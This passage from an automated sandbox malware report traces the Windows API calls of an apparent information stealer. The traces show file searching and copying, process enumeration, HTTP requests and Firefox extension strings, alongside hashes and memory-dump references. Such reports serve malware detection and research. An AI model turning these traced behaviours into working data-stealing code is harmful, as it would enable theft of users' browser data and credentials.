                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040A231
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040A5EA
                                                                                            • Part of subcall function 00409E60: memcmp.MSVCRT ref: 00409E7B
                                                                                            • Part of subcall function 00409E60: memset.MSVCRT ref: 00409EAE
                                                                                            • Part of subcall function 00409E60: LocalAlloc.KERNEL32(00000040,?), ref: 00409EFE
                                                                                          • lstrlenA.KERNEL32(00000000,00000000), ref: 0040A32D
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040A671
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$AllocCopyDeleteLocalSystemTimememcmpmemset
                                                                                          • String ID:
                                                                                          • API String ID: 3258613111-0
                                                                                          • Opcode ID: b68d428d358eb233707b55884b84f0156d73bcf5e8a67310085237626846fe48
                                                                                          • Instruction ID: babd7ff3150fa9bd4e199d5026f054df416ea87c2dc191fa558e2381e0c2d671
                                                                                          • Opcode Fuzzy Hash: b68d428d358eb233707b55884b84f0156d73bcf5e8a67310085237626846fe48
                                                                                          • Instruction Fuzzy Hash: 17D12472811108AACB14FBA5DC96EEE7338AF14314F50815EF51772091EF786A9CCB7A
                                                                                          Function 0040D5C0 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 00418600: GetSystemTime.KERNEL32(?,007F1C10,0042059E,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418626
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D641
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D7DF
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040D7F3
                                                                                          • DeleteFileA.KERNEL32(00000000), ref: 0040D872
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                                                                          • String ID:
                                                                                          • API String ID: 211194620-0
                                                                                          • Opcode ID: a6d085273746bd85741f5d767bc7a44b418890b6fcff0096d709ee887cb72c2d
                                                                                          • Instruction ID: b9a8a4b288ee9f939e53bd87e1647cffb120ee14b7120403b064e1d16f2d4ef2
                                                                                          • Opcode Fuzzy Hash: a6d085273746bd85741f5d767bc7a44b418890b6fcff0096d709ee887cb72c2d
                                                                                          • Instruction Fuzzy Hash: DC814472911108ABCB14FBB1DC96EEE7339AF54318F40452EF40772091EF786A58CB6A
                                                                                          Function 0040F2E0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 00409A10: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00409A3C
                                                                                            • Part of subcall function 00409A10: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00409A61
                                                                                            • Part of subcall function 00409A10: LocalAlloc.KERNEL32(00000040,?), ref: 00409A81
                                                                                            • Part of subcall function 00409A10: ReadFile.KERNEL32(000000FF,?,00000000,00410127,00000000), ref: 00409AAA
                                                                                            • Part of subcall function 00409A10: LocalFree.KERNEL32(00410127), ref: 00409AE0
                                                                                            • Part of subcall function 00409A10: CloseHandle.KERNEL32(000000FF), ref: 00409AEA
                                                                                            • Part of subcall function 004188D0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 004188F2
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                            • Part of subcall function 0041A2F0: lstrcpy.KERNEL32(00000000,?), ref: 0041A342
                                                                                            • Part of subcall function 0041A2F0: lstrcat.KERNEL32(00000000), ref: 0041A352
                                                                                          • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421524,00420D7A), ref: 0040F38C
                                                                                          • lstrlenA.KERNEL32(00000000), ref: 0040F3AB
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                                                                          • String ID: ^userContextId=4294967295$moz-extension+++
                                                                                          • API String ID: 998311485-3310892237
                                                                                          • Opcode ID: 85423c3c242042876a530643f9dd54465e4553440514c6f4521d5ac1c91b2fd3
                                                                                          • Instruction ID: 29c62e45bd112fa8e6d3d1c16e218030d21c495d55cc38802304d1b40baba72e
                                                                                          • Opcode Fuzzy Hash: 85423c3c242042876a530643f9dd54465e4553440514c6f4521d5ac1c91b2fd3
                                                                                          • Instruction Fuzzy Hash: D2513175D01108AACB04FBB1DC56DEE7338AF94314F40812EF81767191EE7C6A58CB6A
                                                                                          Function 00418120 Relevance: 6.1, APIs: 4, Instructions: 77processCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A110: lstrcpy.KERNEL32(00420ADA,00000000), ref: 0041A158
                                                                                          • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 0041816A
                                                                                          • Process32First.KERNEL32(?,00000128), ref: 0041817E
                                                                                          • Process32Next.KERNEL32(?,00000128), ref: 00418193
                                                                                            • Part of subcall function 0041A380: lstrlenA.KERNEL32(?,004210E0,?,00000000,00420ADA), ref: 0041A395
                                                                                            • Part of subcall function 0041A380: lstrcpy.KERNEL32(00000000), ref: 0041A3D4
                                                                                            • Part of subcall function 0041A380: lstrcat.KERNEL32(00000000,00000000), ref: 0041A3E2
                                                                                            • Part of subcall function 0041A270: lstrcpy.KERNEL32(?,00420ADA), ref: 0041A2D5
                                                                                          • CloseHandle.KERNEL32(?), ref: 00418201
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcpy$Process32$CloseCreateFirstHandleNextSnapshotToolhelp32lstrcatlstrlen
                                                                                          • String ID:
                                                                                          • API String ID: 1066202413-0
                                                                                          • Opcode ID: 56a5cc5f625808877023b0fd7aaa37bf15a2ec62f2c2cab451d14b7958c2b5f4
                                                                                          • Instruction ID: 6084a3a81ad9197a86b05fcc5bdad381a42aa545a74b9a2169b69cd5b8afd334
                                                                                          • Opcode Fuzzy Hash: 56a5cc5f625808877023b0fd7aaa37bf15a2ec62f2c2cab451d14b7958c2b5f4
                                                                                          • Instruction Fuzzy Hash: 8E319E71902218ABCB24EF95DC45FEEB778EF04710F10419EE50AA21A0DF386E85CFA5
                                                                                          Function 00416593 Relevance: 6.0, APIs: 4, Instructions: 30sleepCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • OpenEventA.KERNEL32(001F0003,00000000,00000000,00000000,?,00816A50,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 0041656A
                                                                                          • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000), ref: 00416588
                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00416599
                                                                                          • Sleep.KERNEL32(00001770), ref: 004165A4
                                                                                          • CloseHandle.KERNEL32(?,00000000,?,00816A50,?,004210DC,?,00000000,?,004210E0,?,00000000,00420ADA), ref: 004165BA
                                                                                          • ExitProcess.KERNEL32 ref: 004165C2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseEventHandle$CreateExitOpenProcessSleep
                                                                                          • String ID:
                                                                                          • API String ID: 941982115-0
                                                                                          • Opcode ID: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
                                                                                          • Instruction ID: a64f93d993f1e87f951aacd978fe42101be04856bc676c4d6d5bcee74d417e49
                                                                                          • Opcode Fuzzy Hash: e67069b7a25109c1f103972856e5ff06790c1bc0ba95d107da3788f3134d6b09
                                                                                          • Instruction Fuzzy Hash: F0F08230900605FFEB20ABA0EC09BFE7736AF04715F11441BB916A51D5CBF89582CA6E
                                                                                          Function 00414CD0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 50COMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 0041A170: lstrcpy.KERNEL32(?,00000000), ref: 0041A1B6
                                                                                            • Part of subcall function 004062D0: InternetOpenA.WININET(00420DE6,00000001,00000000,00000000,00000000), ref: 00406331
                                                                                            • Part of subcall function 004062D0: StrCmpCA.SHLWAPI(?,0081C7C8), ref: 00406353
                                                                                            • Part of subcall function 004062D0: InternetConnectA.WININET(00000000,?,?,00000000,00000000,00000003,00000000,00000000), ref: 00406385
                                                                                            • Part of subcall function 004062D0: HttpOpenRequestA.WININET(00000000,GET,?,0081BC80,00000000,00000000,00400100,00000000), ref: 004063D5
                                                                                            • Part of subcall function 004062D0: InternetSetOptionA.WININET(00000000,0000001F,?,00000004), ref: 0040640F
                                                                                            • Part of subcall function 004062D0: HttpSendRequestA.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00406421
                                                                                          • StrCmpCA.SHLWAPI(00000000,ERROR), ref: 00414D08
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: Internet$HttpOpenRequest$ConnectOptionSendlstrcpy
                                                                                          • String ID: ERROR$ERROR
                                                                                          • API String ID: 3287882509-2579291623
                                                                                          • Opcode ID: 58d2b9f8748834604f24f38fd7cdd392fe5c4ffa99ef35d538bd2fc66a2a16af
                                                                                          • Instruction ID: 9b7a9698bb488a37f3de611b15de8acf20b28e6af01427a962a44d236a29daab
                                                                                          • Opcode Fuzzy Hash: 58d2b9f8748834604f24f38fd7cdd392fe5c4ffa99ef35d538bd2fc66a2a16af
                                                                                          • Instruction Fuzzy Hash: 7F113330901108B7CB14FF61DC56AED7338AF50354F90816EF80B5A5A2EF786B95C75A
                                                                                          Function 00414A20 Relevance: 5.1, APIs: 4, Instructions: 70stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 00414A5A
                                                                                          • lstrcat.KERNEL32(?,00421040), ref: 00414A77
                                                                                          • lstrcat.KERNEL32(?,00816C70), ref: 00414A8B
                                                                                          • lstrcat.KERNEL32(?,00421044), ref: 00414A9D
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
                                                                                            • Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
                                                                                            • Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
                                                                                            • Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_file.jbxd
                                                                                          Similarity
                                                                                          • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                                                                          • String ID:
                                                                                          • API String ID: 2667927680-0
                                                                                          • Opcode ID: d9a7bb441cace2264c65b2c89e45308c98edaaf84c68a629cbd2b1765e33ed5e
                                                                                          • Instruction ID: 8dbf70b05384144c92fb0b395b2fe843caac1dc39a8cdd365ca80c12b48963c0
                                                                                          • Opcode Fuzzy Hash: d9a7bb441cace2264c65b2c89e45308c98edaaf84c68a629cbd2b1765e33ed5e
                                                                                          • Instruction Fuzzy Hash: B6214F76A002086BC724FBA0EC42EDD373DAF94304F40845EB94A571D1EE7856C98BA5
                                                                                          Function 00414690 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 118stringCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                            • Part of subcall function 00418880: SHGetFolderPathA.SHELL32(00000000,?,00000000,00000000,?,?,000003E8), ref: 004188AB
                                                                                          • lstrcat.KERNEL32(?,00000000), ref: 004146CA
                                                                                          • lstrcat.KERNEL32(?,0081B998), ref: 004146E8
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 0041440C
                                                                                            • Part of subcall function 004143F0: FindFirstFileA.KERNEL32(?,?), ref: 00414423
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FAC), ref: 00414451
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,00420FB0), ref: 00414467
                                                                                            • Part of subcall function 004143F0: FindNextFileA.KERNEL32(000000FF,?), ref: 0041465D
                                                                                            • Part of subcall function 004143F0: FindClose.KERNEL32(000000FF), ref: 00414672
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 00414490
                                                                                            • Part of subcall function 004143F0: StrCmpCA.SHLWAPI(?,004208BA), ref: 004144A5
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144C2
                                                                                            • Part of subcall function 004143F0: PathMatchSpecA.SHLWAPI(?,?), ref: 004144FE
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,0081C728), ref: 0041452A
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FC8), ref: 0041453C
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414550
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,00420FCC), ref: 00414562
                                                                                            • Part of subcall function 004143F0: lstrcat.KERNEL32(?,?), ref: 00414576
                                                                                            • Part of subcall function 004143F0: CopyFileA.KERNEL32(?,?,00000001), ref: 0041458C
                                                                                            • Part of subcall function 004143F0: DeleteFileA.KERNEL32(?), ref: 00414611
                                                                                            • Part of subcall function 004143F0: wsprintfA.USER32 ref: 004144E7
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2520086702.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2520086702.000000000043C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000046A000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000493000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000049F000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004C4000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004D1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004F1000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000004FD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000500000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.0000000000587000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.00000000005AD000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000062C000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2520086702.000000000063E000.00000040.00000001.01000000.00000003.sdmpDownload File
